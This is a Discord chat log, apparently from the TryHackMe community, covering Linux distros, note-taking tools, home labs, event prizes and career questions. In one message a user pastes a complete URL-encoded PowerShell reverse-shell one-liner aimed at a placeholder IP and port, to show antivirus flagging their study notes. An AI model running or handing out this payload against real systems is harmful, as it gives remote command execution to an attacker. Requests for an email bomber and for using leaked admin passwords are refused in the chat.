#quiet-conversation
Any distro should be fine
I use fedora, I've heard good things about pop os, some people like arch
Can someone help me with this question XSS attacks are more than just JavaScript code. You also need to know the basics of HTML.
If you recall from the recipe, HTML tags are used to create elements on a web page. Sometimes injecting harmless HTML can lead to discovering XSS vulnerabilities, especially when your payload is blocked by the server.
GOAL:
Inject an extra paragraph element.
@south inlet
Where is this from?
Class I'm taking
We can't help with classwork, sorry.
Try Mint
Ik this is a bit irrelevant, but does fedora boot slower compared to most distros
Boots pretty fast for me
Haven't noticed
ARCHLINUX BOOOOOOM
hello, can someone give me any good resources where i can read about vulnerabilities? also how those vulns were exploited. I've got some blog webs but they only talk about the vulnerability not how it was actually exploited.
and is there a way i could practice to exploit those on my own? Well, I'm not interested in web exploitation.
I mean if there was vulnerability found in an OS or any application and i wanna practice exploiting it and maybe write my own PoC.
You look at the research articles
Hey team! Happy thursday!
@twilit portal Kebab
Hello, have a question regarding my account. I previously created my first account with my student email, and made pretty good progress through some of the learning paths. TL;DR I was using a student account, but now my school has moved their email services to O365, and they removed my student email since i graduated in 2021, and I have lost access to this account.
Is there any way to get my data transferred over to my new account so I don't lose all of my progress?
Are you not able to login to TryHackMe?
Oh, I see, nvm. I don't think that's possible
Done!
thank you: so kind of you for the follow-up
that was in #site-support when I experimented remmina with VNC to the AttackBox and I had that ugly effect: #site-support message
like in your GIF, I usually get good results with remmina and that button on the left for dynamic resolution update, in particular with THM Windows target machines
but not for this particular case of VNC and THM AttackBox
Gave +1 Rep to @south inlet (current: #1 - 2820)
I'll try the VNC in a minute.
Hello everyone, does someone remember where can I find the lessons on how images could be saved when uploaded in a web form? I studied it from the platform months ago but I forgot where to find it. Thx ❤️
Probably under the web fundamentals path
this is definitely a case where you have to email support
hello, want to know about, what kind of premium content that THM gives if subscribed as premium user? if its not bother, would like to know first if its really any special content included or being trend?
you can see, many of the rooms are available to premium users only. take the windows fundamentals for eg.
although i'd suggest to start from free resources (from yt) and when you're kinda intermediate, buy a subscription.
Learn hacking from yt?
i wont call it 'hacking' but youtube is one of the best places to get started.
Is cybersecurity same thing as hacking
Like if i go study cybersecurity is there hacking
yep
Cybersecurity is when you protect the system by reporting security issues, which could be exploited to hack the system.
Oke
wont be all hacking
if youre talking about studying in college then it probably wont be much of it unless you look specifically to take those courses
will be a lot of information security and business related things
like security and risk analysis, networking
some colleges let students pick from a variety of courses however -- mine has ethical hacking, malware analysis, and digital forensics (which is their blue team stuff)
check the academic course path for your program and see how well it fits your interests
You guys learn hacking on colleges xD
Yeah?
I learned how to do it inside and outside of college
^^
Goes further than ctfs in college
Got help from support, but I ended up finding my old account password cached on my old browser. Thanks
Gave +1 Rep to @spark sun (current: #10 - 780)
Wow! This room so easy I will complete it instantly 😂 😂
quiet-conversation when loud-conversation walks in 😲
Good morning
Should i go IT high school
It's already the Q4 of the year Stop waiting for the perfect moment to chase your dreams, create that moment today, Remember, small steps of every single day will lead to big, life-changing results. You’ve got everything it takes, now is the time to start and make it happen, you still have the last quarter of the year to make to achieve success. Like I also did! Let's go!!
What’s the Q4 of the year mean?
quarter 4
Bet
i.e split the year into 4 parts... and name them q1-q4
used very much inside business and for release dates
is anyone here?
No
No
Nope, that's why its quiet
Ye
Hello
Is there email bomber in kali linux
Depends. For what reason would you want an email bomber?
Oomm... For educational purposes only 👍
I wanna test it how it works and stuff like that
Uh huh. With what end goal?
Send friend very much email
Ah. Gotcha.
In that case @south inlet is the best person to answer 👍
Scary
Yo, why you want something like that for?
Why i want emailbomber?
Just want to see how it works and maybe test it to friends
But nothing bad
...That's not how it works.
That would be illegal, your friends don't own the email accounts
So its illegal to "email bomb" somebody even if you have their permit?
Like im new to this stuff i dont know
You'd need to get permission from whomever owns the email, for example Microsoft, Which I doubt you'd get
If you're unsure, it's probably best you don't
Do u have email bomber
No, because I don't wish to have unethical/illegal tools...
What u think like i want to learn cyber security and ethical hacking and maybe build a career in it so whats the best way to study and learn it
I'd suggest using TryHackMe.
Have a read over #start-here
Can I ask a question? Why does your mind connect email bombing and ethical hacking? Email bombing is just annoying and not ethical and not hacking neither.
Okay thank you
Gave +1 Rep to @south inlet (current: #1 - 2834)
Dunno
Alright, but keep that in mind, as Scrubz told you :)
(:
Does Discord use ur private or public IP in a vc for example?
I think you answered your own question.
Private IP addresses are not routable on the open internet
969
hi all,
i am getting 500 Something went wrong error when i am downloading the openvpn file from Access can someone help me out to resolve this issue?
How well do you guys think obtaining the Jr. Pentester Certificate through THM has prepared me for studying for the OSCP? 5%? 50%? Just curious how much harder the OSCP labs/course work will be compared to what THM Jr. Pentester path has taught me so far
No idea how much, but OSCP is much harder
Jr. Pentester is enough for one to get started with doing standalone machines, recon, Enum and such stuff. I would rec. the "Offensive Pentesting" Path.
Trying the "AD Exploitation" module should be much better for understanding of AD.
Other than Learning, you can do the standalone boxes on tryhackme for practice + go over the TJnull's "OSCP List" and try HTB boxes.
One cool thing you should do is, taking good notes and making your personal cheatsheet.
facts
i have half of my notes on paper and other half on a file 😭
care to explain what this means
Obsidian Notes.
You can link topics to each other, like moc.
does it have code formatting too ?
Markdown formatting.
💪
@snow gulch This isn't even mine lol, it's friends. Who takes very "Extensive" notes.
well tell him he's just like me
People
Looks like a round of Stellaris
Indeed it is.
damn that is impressive i m using logseq but i have problem with sorting it out like i have mess in my notes should spend more time organizing i guess
It's not even mine lol.
it's friend's.
i m wondering is there a way to like share my notes between devices cos in my work i m using company laptop and during pentests i have some notes but on my main machine i have the other half and i have raspberry just laying aroud it should be able to run some file sharing or idk never done that but i dont want it in some 3rd party cloud
Depends on what Note Taking application you are using.
logseq on both company and mine machine and for mobile too
There should be something like that.
@misty obsidian hey, for pwncat-cs why didn't you use the setup with python poetry?
It's there in the docs, for the proper installation
h4xx0rs
I was once a contributor to that project and had an offer to become a maintainer🥲
Got mail from GitHub for your issue
You can also create a virtualenv to use it, and create an alias for it to run via the venv directly
Yeah I struggled with that too. The trouble is that Logseq is not letting you sync between devices. Because of their focus on security and privacy they store everything offline. I do believe they have a function in beta to sync if you contribute financially to the project. Besides that there is a work-around, but it’s a headache imo.
Thanks somehow I had a feeling that it won't be as easy as I thought 
Gave +1 Rep to @sick pivot (current: #2256 - 1)
Haha yeah I tried it myself. It is possible, but Logseq is one of the applications that doesn't make it easy. Understandable given the fact that syncing between devices if there is no encryption in place is a security risk.
But if the syncing is important to you I'd suggest checking out Anytype, it's not exactly the same as Logseq or Obsidian, but it has some similarities and does allow syncing across devices.
well i prefer open source apps if i have an option but this seems interesting
Anytype is open source as far as I'm aware. I prefer open source apps too
That’s cool, how are you doing today?
Does try hack me teach how to make malware
i would like to learn about botnets and how to stop scam call centers
There's a room on Malware Analysis but afaik there's no room on how to create one
What kinda methods do you guys use to take notes? Like digitally. I want to get into the habit of taking notes while I do the tryhackme rooms but I always get overwhelmed or forget to take notes and I want to work on that
it depends but usually i just read the entire page once and then the second time i write down in my own words things that seem important to know
sometimes i copy entire paragraphs remove something to make it shorter cause when i want to go back and read the notes i dont want to read a whole page just find the one thing i wanted
the main thing is to just write what seems important to remember the notes dont have to be perfect so dont worry about it the most difficult thing is to start
Give Obsidian a try—it's a great tool for taking notes!
I mainly use Joplin, but Logseq is also really good depending on the note taking style you prefer
@novel mist @sick pivot thanks for your recommendations! Will check those out
Gave +1 Rep to @novel mist (current: #2259 - 1)
Hey guys. I believe it's my first time asking this question here. I been doing SOC Analyst Level 1 for a while now. As I progress further, the challenges get tricky. There were some times I couldn't find information I want when googling before resorting to walk ups. I wanted to gather your wisdom on how to search for results before resorting to walk ups. For instance, SNORT and SNORT The basics really made me bang my head as I couldn't figure out proper commands. How do you approach that you are not familiar with it and where to look despite using (commands) --help?
Hey y'all, I'm not sure if this is the right place to totally open up, but I joined here out of curiosity for general programming and Mr. Robot (😂).
I don't want to sound TV-brained, but would these learning tools potentially help to learn more about some harassment I've been receiving over the past couple of months? Nothing like precision tracking of this person, but rather some insight on who it may be, so I can not be so anxious all the time lol.
If you're being harassed, contact the relevant authorities in your region. US would be FBI or one of the few Cyber Joint Task Forces.
Unfortunately, I'm in Canada and these sorts of cases don't get much traction. To be fair, I haven't received anything really which leads me to believe I'll be harmed anytime soon (except for some vague "bad things will happen" text lol.)
I appreciate the response.
Funny I'm in Canada and went thru the same
I create scenarios within my notes, write them as a script
e.g.
use this command for :
[recommended command by thm or blog]
but this command worked for me:
[command I used]
or just leave the command recommended if that worked for you.
bookmark some blog that helped you thru, put it on the notes just in case
guys is anyone here good with Spark ada
I don’t get when people say “these sorts of cases don’t get traction” how do you know your specific situation won’t get traction? You don’t. Still contact the authorities, don’t compare other situations to your own.
Especially if you feel your life is being threatened, that heightens your case ten fold
Use chatgpt
What kind of harassment
That is precisely what I started doing. I had to start bookmarking on how I got the answer on my own because sometimes the walkthrough didn't work for me (I know sometimes they update rooms) still it wouldn't work as instructions on both tryhackme or walkthrough is unclear so I had to research and find commands that would produce answer.
That would be considered "cheating" But I get your point.
After you finish one room, you can always redo it right there or the next day, with the notes, links whatever, you took.
Great.
That's the problem, I don't believe it's life threatening to begin with, but who knows. You're right though, I guess I don't know what I don't know. I'm back to getting what I assume is random text now numbers, so it's worth a try I guess.
I guess the usual stuff? Texts from unrecognizable numbers, calls with no Caller ID, fake emails, social media DMs (when I still had them active)
What percent (%) of rooms is usable with free thm
About 70%
It's closer to 60 now.
😢
Who plays COD HERE?
Used to
Do you still have the logins to your account 😪
Yes
👀
finally got lvl up ngl seeing that number go up kinda keeps me going
.

Of course , good thing to start with 🙂
hey guys what after i finish the road map i already bought premium
which roadmap
play ctf ?
THM has a couple of learning paths you can do. A recommendation on the order of completing those can be found here - #general message
I use both notion and obsidian and I can say both are great but notion is better. You can access your notes online
Cherrytree is great until your notebook reaches a certain size
Mine started crashing at about 40MiB.
It's also a pain in the backside to export from.
Obsidian is great until you start taking notes on windows exploitation and store them on Windows. Then they start to disappear quite quickly. Disadvantages of storing your stuff in plaintext. Just ask @remote echo
Notion is great until the company decides they don't like your notes and cut your access... just ask @tribal heart 
ftw
My windows defender quarantines my "What The Shell?" notes because of this powershell command:
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
its in notepad.
says its a Trojan:PowerShell/ReverseShell.HNAA!MTB
Yeah, it'll do the same with Obsidian. Joys of storing your notes in plaintext
My computer is full can I move my Kali on my USB drive ?
Well they didnt cut my access... the waf just didnt like me kek. A little chat fixed it. But it would happen again. Instead I trilium
Not a good idea to take notes on exploit development in other ppls websites anyways
Classic
that's why i moved to joplin
You made me click the emote to see wtf it was, now I'm upset 
I was enrolled at WGU, but I quit. Now I’m wondering what else I can do to break into the CS field. Honestly, I feel like I lack the mental fortitude for self-study, and constantly starting and stopping has me thinking about leaving it all behind.
can anyone help me with that junior security analyst intro answer?
What will be your role as a Junior Security Analyst?
triage specialist
Is a virtual machine and home lab the same ?
home lab is usually multiple virtual machines simulating a network. Like a windows server VM as a domain controller / DHCP / DNS and another windows server as a file server (shares and storage...) 2 other windows OS as clients.
This helps to practice pentesting a network. Getting access to a client > pivoting to the other client > getting access to the file server > and eventually getting access to the domain controller.
I wanted to check if you have conducted security testing on macOS 15. If so, I would greatly appreciate your insights or any help you can provide from a security perspective. It would be helpful to understand any potential vulnerabilities or key areas to focus on
Cybersecurity is a huge field with a lot of different types of problems. If you find one that keeps you curious and wanting to learn more, you can find a way. If you find yourself losing interest and not wanting to put in the effort even after taking a break, maybe you should think if it is the best field for you. In the end only you can tell and make that decision for yourself. But personally, curiosity is what kept me going, and why I keep going for more.
It is perfectly valid to also see it as a hobby and not a career path. Lots of ppl also do it like that. There is no "one size fits all", we are human, and your experience may vary.
had a question about ccna examination, do you need to have actual hands on experience with trouble shooting stuff and working with hardware or just theory knowledge is enough to crack it?
You have labs on the exam but you can practice with packet tracer
Any Help?
ohhh, guess i should get started with it.
Thanks for clarifying!
Gave +1 Rep to @weary meteor (current: #212 - 30)
Oh so you would need multiple computers for a home lab ?
Or do you switch between vms on 1 computer
not computers. VMs. If you have a monster PC with 64 GB of RAM and 2 TB of storage you can install multiple VMs on it.
Oh wow
I mean it's still possible to work with 32 GB. even with 16 GB but you're gonna have a painful time having all of those VMs on at the same time.
As a beginner 1 attacker machine for example kali linux, 1 windows server and 1 windows client is enough. This can be done with 16 GB ram as well.
hi, is anybody able to help me with making requests? bit lost here
you mean http-requests?
yeaa
what is the problem?
uhm im not sure what the id parameters mean like the key and value thingies
so i cant get the answers for 2 4 and 5 /:
parameters are what you see in the url:
www[.]blabla[.]com/index.php?parameter=value
which room is this?
right but when u launch the simulator thingy it gives u like a configuration button
http in detail
and which task?
task 7, the very last one
for question 2:
the parameter is called id and the value is 1
click on the save icon and then go
🫡
to set parameters in the task you only need to click the gear in the top right
oh i see, thanks sm!
the key is the parameter.
#room-help is the channel for this.
hey guys; i love the new tryhackme web design 🔥
it is lowkey very clean
is there a discord channel for windows based programming
using powershell x .bat (batch) x VBS x js x anything else that can be executed natively on windows
not restricted to using devcon and the useless dependencies
when you can program it the native way
I want to release in the future a certain windows bug patch related to windows behaving as if the computer no longer has a wifi adapter, and even disabling the ethernet adapter, this bug often occurs when the user uses hibernate, this bug has appeared from 2020-2021-2022 I've reported the bug to windows many times but they didn't even bother to read it or even react to it (when this bug occurs users often reset their computer reinstalling windows or even go as far as to switch to linux or other OS)
I happened to discover a valid remediation this year, all these years I struggled with this bug unable to use wifi and relying on ethernet that often gets disconnected as well, thankfully ethernet can be easily reestablished, I didn't want to switch to linux or other OS because I simply didn't feel comfort but when using windows
months ago, I decided to write the patch as an automation, since manually doing a remediation is really annoying and a waste of a time for a programmer
I haven't completed writing the final patch
but the current patch I wrote using devcon solves the problem
however devcon seems like a hassle since an alpha user isn't supposed to install external dependencies when a simple problem can be solved natively
Recently I found out I can just write it fully in PowerShell which is better
since the simple user won't have to install any dependencies and would solve the problem immediately
I still haven't written the code in a full automated way that can be released as an official release, so right now it's still as instructions
even after completing the full automation, I want to make sure I'm doing things right
if yes how do i unlock it? which freemium challenges I need to conquer ?
so the main problem is that during hibernation the wifi adapter stops working?
it's just refreshing
In which context ?
cyber
.
I love pineapple juice with mayo
kewpie mayo or regular mayo though?
Does anyone know how to fix the input lag in VMWare? I tried multiple solutions. One temporarily worked, others none.
Tell me the ones you know. I'll try it if I already haven't.
Indicate what you’ve tried in your msg too so that others know.
can anyone help me learning penetration testing
Have a look at #start-here
TryHackMe also has a new ongoing promotion for people wanting to learn Cyber. Have a look at #announcements message.
Looking for mates to skilled together on THM. I am up with basics but not pro or great.
Anyone up for this?
yes same let's add each other friend and compete
Yes
https://medium.com/@matterpreter/cve-2023-28072-local-privilege-escalation-in-alienware-command-center-a836607762ba interesting cve writeup i found
I started studying cybersecurity a little through tryhackme, in one of the rooms about research tools, I decided to open my Google and do a password search using the search parameters I learned, having just found a file with admin passwords for a website , other than site management gmail passwords, the question is, is this as far as I can go without breaking any laws? Or can I log into the website and email as admin because the passwords were relatively public on the internet?
Might depend on where you live, but I guess you already answered that to yourself
There are discussions on the legalities of OSINT but short answer is no, you cannot login to the website.
That can be attributed as cybercrime or computer misuse by law as you do not have proper authorization on it.
My perspective is: OSINT is legal but you shouldn’t do it unless you have explicit permission, have a written contract or ROE in place.
Is it me or I'm noticing the patterns of each room comes with specific vms. Like I was just coming out of Zeek and I realized that it doesn't even have basic stuff like mouse which I had to use Nano just to make it easier to read the columns name instead of Cat which makes it bit difficult to read. Is that the purpose? To force you use cli all the time?
Was the machine CLI only?
Vms are probably reused as well, or at least base vms
I wouldnt say CLI only. Only because there was no other usable program like Text Editor or cannot use Gedit. So had to use nano or vi
iirc, the Zeek rooms used a Linux VM with Zeek already installed, and it was using the zeek-cut command a bunch to output the specific field-value pairs you wanted
Hi here 🙂 ,
idk where to ask: is there any new room planned for this week ?
(i know there is 20+ rooms with cyber101)
i'm just asking, i already miss the new challenges fever 
hi can anyone help me pls with this q in the new path in thm in cryptography
Knowing that XRPCTCRGNEI was encrypted using Caesar Cipher, what is the original plaintext?
ICANENCRYPT
don't post answers please
(also he has solved it already but that's not your fault for not seeing since it was in another channel)
oh sorry i didnt notice the thm abbreviation
(i was too excited to use the bruteforced i coded)
https://dcode.fr has lots of different ciphers and a cipher detection tool
I know you already solved it but for future reference
Can i be fully anonymous by using proxy chains and tor
Why you need to be fully anonymous?
Im still learning i only need to know that is it ok to be like that
are all prizes of cyber101 got claimed?
I suggest playing around in a controlled or lab environment would be ideal while you are learning. It isn't a good idea to try stuff on assets or resources owned by other people especially if you don't have consent.
What do you mean? There are prizes that are unlimited (Cyber Crusader title and streak freezes) and there are prizes that do (e.g., defcon, laptop, shirts, caps, etc.)
Which ones are unlimited?
I’ve been actively completing rooms—more than four in a single day—while studying, but I've noticed an issue with redeeming my tickets. After finishing each room, I receive only a 7-day streak freeze, a 1-day streak, or new badges.
Initially, I received various tickets, but now I hardly get any. Could you please help me understand why I'm not receiving the tickets
Are the rooms you are working on included still in the CyberSecurity 101 path?
Yes
Enrolled In Cyber Security 101
Experiencing with ticket redemption. I've already redeemed my tickets and claimed my prizes, but Why ?
Have you checked whether the tickets go into the Tickets tab within your account or profile?
Yes, I’ve checked, and I can confirm that I’ve already redeemed the tickets. However, they continue to appear repeatedly, even though they shouldn’t. It seems like a glitch in the system.
because the rewards are over
its first come first get
Oh OK.
I was so close to claiming required only one ticket to get the reward.
But on the same side my friend also receiving the tickets like Laptop.
Does anyone get any voucher after completion of cybersecurity 101 path?
stop spamming all channels with the question, ask at least in the event channel. thanks.
Gave +1 Rep to @earnest tide (current: #2328 - 1)
Same here got 2 tickets of everything but never got the 3rd one
what is everyone up to, today/this evening?
programing
from the way the event seems to be constructed the first 2 tickets are randomly given away and have infinite supply whilst the third ticket for any given event are limited and have likely run out now.
Procrastinate 😄 😄
and you?
Same really, just waiting until my partner goes to work before I do anything lol
😄 why not now anything 😄
Been in a 3 hour convo about our wedding with my partner lol
I'm now tired so I will probably continue watching castlevania on netflix
Ahh okey 😄 Planning a marriage is supposed to be quite stressful. I hear
have fun.
We have it planned, got the venue booked and everything lol
planning is the most stressful thing about the wedding or isn't? Way too much decision to make 😄
It is, which is why we decided on a small wedding.
Not bad either. If you have families where this is possible, that's good 😄
We don't we have to hire witnesses lol 😆
If you and your partner have a family with 200 members then we'll talk about the witnesses 😄 If you even not inviting the child they get pissed on you 😄 😄
Hi??
I m doing rooms but why I only getting cyber crusader, 1 week freeze & 7 day freeze?
the greater the prize, the less probability
yrr please help me
in the room : Windows Fundamentals 1
I am unable to get the answers for task 6 of questions 2 and 4, please provide me both answers.
actually that questions are about target machine so we can't find them on google
Ask your questions in #room-help
but like I am only getting these 3
Anybody here to talk about codes?
what kind of?
virus codes
nope sorry
thanks
Everybody's getting same.
Malware is an advanced channel topic
Ohh 🥺
Don’t let it get you down!
I got 10 euro swag voucher but the shipping charge to my country is 10 euro🥲
okkk
maybe this exists- but i would like to have an easy way to filter every CTF i should be able to RESOLVE by knowing every Room i have done! Not by level
FOr example . If i have done Intro to Cybersecurity and cybersecurity 101 , i should be in a level to finishes this... rooms!
Question is vague but you do have the 'hide completed' filter in the search option when searching for rooms. And when you navigate to learning paths you can see the ones you've already completed even when they are a part of a more advanced/intermediate learning path. - as long as you don't reset your progress on each individual room you've completed
After a second read - you'd best review the learning paths. Before there were roadmaps for which room to tackle next as github repos. But I think THM team have put a lot of effort in their learning paths and modules to classify and grade learning topics.
Because there are a vast of topics on infosec. Some with more depth and context than others.
All the while the rooms themselves may require prerequisite knowledge on a couple of domains like - recon, privesc & vuln chain to get to the final flag.
There is no straightforward path to guide your every single step. And that's the beauty of it - you draw your own footpath.
Hello, is this the right place to report some bugs? In the room Blaster the second last question (Task 4) is deprecated by metasploit and can't be solved if there is no proficiency with the framework. Also in the first answer of Task 3 the information can't be accessed. I know the answer is in the Suggestion box but in the rdp machine the answer couldn't be found. Thx
I shall refer you to the #room-bugs =D
Hi there, room bugs are posted in #room-bugs
I understand... but there are so many CTF and extra rooms that sometimes you dont know if you have done anything referred to that, so i was just pointing out that it would be great to see like related CTF .
Can you please leave these sort of things to mods
Sorry I didn't know that was a mod question, sure thing
Thanks i haven't seen it !!
can someone recommend a good website to buy a vps to host a linux machine
I want to have a command that can be accessed from everywhere
What will you be using the linux machine for?
Hacking, bug bounty, ctfs
I like to use interserver, just that's just my random personal preference haha. I rent a bare metal server from them and use that to host all kinds of things, including tools for security testing
DigitalOcean is all round the best imo
You can get free credits with Google cloud and azure. Oracle offer a 24GB RAM VPS always free but you do need to make a paid account.
I use a combination of Oracle with Contabo just because the prices are so damn good (£9 a month, VPS2 one)
Contabo or Hetzner are by far one of the best bangs for the money. Huge resources for cheap.
I use Linode, its good and I think they support bug bounty hunting too
Hetzner has a rigorous identification process and I believe they don't like their cloud being used for bug bounty hunting that's why they can take down your account with no say.
Weird. It took me 30 seconds to get signed up
Yep but they also require additional KYC which then they can outright ban people before being able to use the platform.
All I want for Christmas is DuPont Tychem 10000 Level A Suit
you need a real chemical protection suit for christmas

in what possible scenario did they put you in one of the best chemical resistant suits
huge lore drop
I still don't see how chem protection suit would benefit that role
It is a good suit
better safe than comfortable
does anyone want to make a team to play CTF every weekend?
I started the pre-security road. Now I completed linux fundamentals. And I want to know: should I go through these (bash and regular expressions) before Windows fundamentals?
Yes, regex is used everywhere you should definitely check it out 🙂
It also has its use on Windows OS
hey! few days ago I saw the winme event accidentally on the announcements, and thought it'd be fun to participate specially that the fall's weather makes life a bit depressive! and so I was having fun finishing room after room, that all of a sudden my account got reset or something!
the website is asking me to verify my email account, which I no longer have access to :/
but the rest of my account data is verifiable! I was having fun 😦
now I don't seem to even be able to enter any room!
I want my account back
Contact support
with another email address?
or do they have a phone line?
cause I posted in here hoping to catch the attention of the support team!
You need to email support, they do not have a phone line as far as I'm aware, and support requests are not handled in the discord. Send an email using the address associated with your account. Support is very busy, so it will more than likely be a couple of days before you get a response. Remember, if you send a bunch of emails, your request will be moved to the back of the pile. It's how the ticketing system works.
which rooms can I do after pre security ( CTF or attack machine)
Friday challenge coming?
is there any way to make my kali linux that's running in a virtual box less laggy?
That would depend on the resources you allocated to it and the resources available on your host.
It's tricky as some of the challenge rooms require a combination of concepts to do or complete.
I would start at looking at Easy-rated boxes, but then again, it would depend on what concept has been included in a particular box.
gonna go a bit bananas and wipe windows off my stationary and install Arch Linux
thanks for the heads up on not sending too many🥃
I had a tough day, so just permitted myself to nag it away, here! but it never takes that long until I'm reminded of "oh wait a minute, I've been an adult for years now!"
yay guru
hello
UwU
Hello fellas
is it possible to earn money hacking legally making my own flexible hours?
i suppose it's a dumb question cause (almost) everything nowadays we can work remotely but i don't seek much a career, more to enjoy and earn as well
if yes, how so?
Bug bounty or security research
When you say security researcher what do you mean specifically and in what kind of setting?
Again, might seem like a stupid question but half of the machine learning and data scientists I know are all in reality a multipurpose coder, gofer, and general "how do we do this" guys wherever they find consistent work
And they're not exactly happy about it.
Same with cybersecurity
it is a start
tks, but sirholkms has a point.
One example off the top of my head is security research on AV / EDR evasion using novel techniques. People do research and create proof of concepts and then pack it in such a way that it's usable commercially.
Another can be security research and hunting 0-days on widely used products. Pwn2Own is an example of that kind of event.
Thanks for the clarification
They should yell at their business managers for not understanding how to correctly apply their domains - and security teams really ought to be single-purpose. They should not be managing any system that isn't owned by them.
that's such a niche role to do independently. I would hazard that there are less than 1000 people worldwide doing security research in that way as a profession and not a side-gig/hobby
I believe hibernation may not be the solid trigger, as windows is very much flawed by default the way windows mechanisms can self-conflict with ease
However, the laptops in which hibernate was activated upon, manifested said bug
This might not only affect windows 10, but it was mostly manifested in windows 10;
there's a slight chance this might occur in windows 8 due to similarities of mechanisms with windows 10, but currently i have no data to support that, so we assume it's a windows 10 bug unless proven otherwise
hibernation might trigger that
but this might get triggered without the user using hibernate as windows employs hibernate at certain circumstances automatically
which means by default using windows 10 with enough time, your computer will enter through hibernation even if you didn't trigger hibernate yourself, this depends on your battery settings and windows choosing to go through hibernate automatically under certain conditions
even using regular shutdown or restart doesn't solve the problem
the bug is way deeper than that
it's self-induced through windows mechanisms
the updates cannot deal with a "non-existent" problem
windows won't fix those things unless a higher-up speaks up about it, it isn't considered a bug by windows since they don't even know about it
Even though this bug was reported many times several years ago and no one cared, not even a reply or comment
I'm pretty sure I'm not the only one who reported this issue, I've met with people who had experienced the same level, and some of them because of that no longer use windows
( I didn't 100% proofread my text, so please don't mind my textual errors )
Even google isn't efficient at solving similar problems
they make the so called "top-conductors" who might not even qualify to fix said bugs same thing for windows
the same "top-grass" would dismiss core bugs and even label it as "chit-chat"
as this really happened to me years ago when i reported a core bug related to google translate to google, even though there was no possibility for me to report non-security bugs,
I managed to engineer entry to make a google "top-grass" to acknowledge my bug, after contacting a higher up google employee who gave me the privilege to report my bug directly to a "top-grass", yet said "top-grass" dismissed the core-bug, as they couldn't even understand the problem, even though i made it clearly illustrated with details, and they classify it as "chit-chat" and marked it as the equivalent of complete
while the core-bug was fixed maybe a year or even later after google testers found out about it
Companies only care about security bugs, since it can damage them financially
windows isn't aware of the bug or that it might damage its reputation and money, so that's why they won't cope with those issues
i used windows 8.1, hibernation turned my wifi adapter off as well
also honestly just switch to linux
nah linux i tried it
linux is pretty cool for coding
and maybe IT and just that
windows is even better in terms of visuals & softwares
can't wine them all
linux will make your machine way fast compared to windows
and for gaming, linux is still lacking
simply watching videos on linux feels a bit weird since the image isn't portrayed as good as windows
you can always VM everything and test-drive them all
for tryhackme & folks you'd need to use a linux based OS and maybe kali
also for malware dev or analysis windows feels really fresh
windows works around money ( security updates always updated ) , but it's way too dysfunctional
( non-security bugs are way dismissed )
that disorder can be used against windows
< which makes exploring windows to me more fun >
I haven't reversed windows but many have done that
i can fix her
literally i can fix her
( referring to the windows dilemma )
I'm not gonna leave windows
i will fix the bugs
and will make windows better for everyone
Kali would not be a great OS to daily drive.
U could daily drive parrot, or just install hacking tools on a daily drive focused distro
VMing is the way ?
i agree with that
Can anyone help me with prize redemption on tickets " I have won the $20 swag voucher and redeemed it" now how to use it . !!
You should receive an email with more details
about swag voucher also ??
Yes, you will receive an email 🙂
thanks. Got the mail
Did anyone get 3 laptop tickets yet??
i am curious , who are the winners of defcon tickets !!
Not finished yet, still got tomorrow to go.
You need to redeem it, I think you do this by sending an email to tickets@tryhackme.com
Is it normal that the order discount code I received in my email doesn't cover 100% of the purchase?
As far as I know, you can win 10$ and 20$ discounts. If you want to order more than that, it's on you
You can also win a free baseball cap, that's what I'm talking about here
If you win the cap, then the cap is free
That's what I'm wondering. They sent a code to use at checkout to get the free cap, which I've applied, but it doesn't cover all of the price 😂 cap costs CAD29.47 and the discount removes CAD27.63. I was wondering here if that's normal or if I'm doing something wrong here
Are you maybe selecting the tshirt coupon instead?
I don't think so, I'm copy pasting this code (not displayed)
How does it work with the big prizes where you're supposed to email in to claim the reward? Are 100's of people winning and they are then chosen at random from all the emails? Or is it just a select few who are actually getting 3 of a kind for the prizes?
Who?
any recommendations on how to learn how to hack like other people's computers
which server?
@south inlet they might know.
Kinda sus
@south inlet told me that it was illegal 😦
Depends if you’re doing it illegally without permission.
any experts or more experienced leveled pentesters or soc freelancer would acknowledge if I follow step by step on THM paths it will lead me being a good hacker?
I think you will have a solid base to build on!
Once finished the path is it possible to apply for entry cybersecurity job as Soc analyst for example?
Soc analyst i am sure, i just have a bad feeling or underestimate myself when the subject is pen testing or bug bounty
It depends.. in my country I still need at least a degree in IT and these paths are put only as hobbies. Some employers take a look but others not.. better check the prerequisites in your local area.
It's true that based on some country things can be different. Anyone has some review for france?
It's feasible for those with right background, it's always evolving so some commitments to ongoing education and development is crucial
You would typically need a mix of technical and analytical skills and be familiar with security tools
And internships would be even more valued
It's kinda tough to get into cyberjob even if on article they said that the field needs people.
Check out this one
I can't be on internship cause I already work on IT Helpdesk. But i heard that helps yeah
Lucky you buddy.
I won the seven day streak freeze, but still my streak reset after missing one day. Will the streak freeze get credited afterwards.
Hey, please contact support@tryhackme.com :)
Hmm
Nah man, I'll pass.
Then why you complain lmao
Bro wanted to get help on discord because email support takes 2-5 business years to get back to you 🤣
Hey 👋
Could you DM me your email address so I can check your support query was received? It shouldn’t be taking that long 🙂
You should ping @icy swift about it (lemme do that for you), it's not my support query 👍
Phoenix didn’t submit a support query:) it was stated in a previous message
Just had to check as 2-3 years is quite long whereas I was under the impression support got back to queries in under 7 days 🙂
I just didn't want to bother the support, after all it was just 14 day streak.
@dreamy kayak @twin ridge
hi help me
With?
I am a new person, I just bought premium and there are ready-made road maps, I don't know how to proceed when I finish the road map, I don't know how to solve which ctfs, I am very confused right now, can someone knowledgeable help me?
#start-here here's something for you to read
